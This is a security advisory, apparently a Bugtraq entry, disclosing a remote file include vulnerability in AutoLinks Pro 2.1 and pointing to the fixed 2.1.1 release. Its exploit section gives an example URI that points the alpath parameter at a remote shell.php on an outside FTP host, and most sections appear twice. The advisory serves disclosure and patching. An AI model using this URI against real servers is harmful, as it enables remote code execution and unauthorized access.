AutoLinks Pro Al_initialize.PHP Remote File Include Vulnerability
BID:14686
Info
AutoLinks Pro Al_initialize.PHP Remote File Include Vulnerability
| Bugtraq ID: | 14686 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 29 2005 12:00AM |
| Updated: | Aug 29 2005 12:00AM |
| Credit: | 4Degrees and the NewAngels Team are credited with the discovery of this vulnerability. |
| Vulnerable: |
Autolinks Autolinks 2.1 |
| Not Vulnerable: |
Autolinks Autolinks 2.1.1 |
Discussion
AutoLinks Pro Al_initialize.PHP Remote File Include Vulnerability
AutoLinks Pro is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
AutoLinks Pro is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Exploit / POC
AutoLinks Pro Al_initialize.PHP Remote File Include Vulnerability
No exploit is required.
An example URI has been provided:
http://www.example.com//al_initialize.php?alpath=ftp://host.com/shell.php?
No exploit is required.
An example URI has been provided:
http://www.example.com//al_initialize.php?alpath=ftp://host.com/shell.php?
Solution / Fix
AutoLinks Pro Al_initialize.PHP Remote File Include Vulnerability
Solution:
The vendor has released Autolinks 2.1.1 to address this issue. A patch is available for prior releases as well. Please contact the vendor to obtain the upgrade or patch.
Solution:
The vendor has released Autolinks 2.1.1 to address this issue. A patch is available for prior releases as well. Please contact the vendor to obtain the upgrade or patch.
References
AutoLinks Pro Al_initialize.PHP Remote File Include Vulnerability
References:
References:
- ScriptsCenter Autolinks Web Site (ScriptsCenter Autolinks)